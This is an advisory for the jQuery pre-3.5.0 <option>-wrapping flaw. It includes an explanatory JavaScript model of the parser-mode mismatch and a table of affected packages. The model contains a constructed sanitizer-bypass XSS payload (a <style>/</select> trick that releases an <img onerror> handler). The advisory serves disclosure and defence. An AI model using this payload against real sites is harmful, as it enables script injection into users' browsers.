In jQuery versions 1.0.3 and later and before 3.5.0, passing HTML containing <option> elements from untrusted sources, even after sanitizing it, to one of jQuery's DOM manipulation methods (e.g. .html(), .append() and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
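Why sanitizing first does not help here: before 3.5.0, jQuery inspected the first tag of an HTML string and, when it was <option>, wrapped the whole string in a <select> before handing it to innerHTML, so the browser parsed it in the HTML parser's "in select" insertion mode, where a <style> start tag is dropped instead of opening a raw-text element and a stray </select> returns the parser to "in body". A sanitizer that parses the same string in "in body" context sees a different tree. The following is an added example, not jQuery's own code or the advisory's: it reduces jQuery's wrapper and the two parser modes to a deliberately tiny model (an assumption: only the rules this issue depends on are implemented), uses a constructed payload, and assumes a sanitizer whose allowlist includes option and style.

```javascript
// Added example, not jQuery's code. Models the parse-context mismatch behind
// this advisory with a tiny HTML parser that implements only the "in body"
// and "in select" rules the issue depends on (assumption).

// jQuery < 3.5.0: detect the first tag; for <option>/<optgroup>, wrap the
// string in a <select> before innerHTML. (Simplified from jQuery's wrapMap.)
const rtagName = /<([a-z][^\/\0>\x20\t\r\n\f]*)/i;
const selectWrapper = ["<select multiple='multiple'>", "</select>"];

function legacyWrap(html) {
  const m = rtagName.exec(html);
  const tag = m ? m[1].toLowerCase() : "";
  return tag === "option" || tag === "optgroup"
    ? selectWrapper[0] + html + selectWrapper[1]
    : html;
}

// Minimal model of which elements an HTML parser creates. Two rules matter:
//  - in body: <style>/<script> swallow everything up to their end tag as raw
//    text, so markup inside them never becomes an element;
//  - in select: <style> (and most other start tags) is a parse error and is
//    dropped, while </select> returns the parser to "in body".
function parseElements(html) {
  const created = [];
  const tagRe = /<(\/?)([a-z][a-z0-9]*)[^>]*>/gi;
  let mode = "body";
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const isEnd = m[1] === "/";
    const name = m[2].toLowerCase();
    if (isEnd) {
      if (mode === "select" && name === "select") mode = "body";
      continue; // other end tags do not create elements in this model
    }
    if (mode === "select" &&
        !["option", "optgroup", "script", "template"].includes(name)) {
      continue; // ignored in the "in select" insertion mode
    }
    created.push({ name, raw: m[0] });
    if (name === "select") mode = "select";
    if (name === "style" || name === "script") {
      // raw-text element: skip to its end tag, nothing inside is markup
      const close = html.toLowerCase().indexOf("</" + name, tagRe.lastIndex);
      tagRe.lastIndex = close === -1 ? html.length : close;
    }
  }
  return created;
}

// A sanitizer that parses in "in body" context and allow-lists element
// names (assumption: option and style are on its allowlist).
function sanitizerAccepts(html, allowed = ["option", "style"]) {
  return parseElements(html).every((el) => allowed.includes(el.name));
}

// Elements the browser actually creates, with and without the old wrapper.
function createdNames(html, { legacy }) {
  return parseElements(legacy ? legacyWrap(html) : html).map((el) => el.name);
}

// Constructed payload: to the sanitizer, everything after <style> is the
// style element's raw text, so it only sees <option> and <style>.
const payload =
  "<option><style></option></select><img src=x onerror=alert(1)></style>";

function demo() {
  return {
    sanitizerAccepts: sanitizerAccepts(payload),        // true
    legacy: createdNames(payload, { legacy: true }),    // select, option, img
    fixed: createdNames(payload, { legacy: false }),    // option, style
  };
}

console.log(demo());
```

With the wrapper, the <style> that hid the rest of the string from the sanitizer is discarded, the attacker's </select> pops the parser back to body context, and the <img> with its onerror handler is created. Without the wrapper (the 3.5.0 behaviour outside the IE 9 special case), both parsers agree and the <img> stays inert text inside <style>.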
| Package (Ecosystem) | Introduced | Fixed | Limit |
|---|---|---|---|
| jquery(npm) | 1.0.3 | 3.5.0 | N/A |
| jquery-rails(RubyGems) | 0 | 4.4.0 | N/A |
| jQuery(NuGet) | 1.0.3 | 3.5.0 | N/A |
| org.webjars.npm:jquery(Maven) | 1.0.3 | 3.5.0 | N/A |
| components/jquery(Packagist) | 1.0.3 | 3.5.0 | N/A |
CVSS Metrics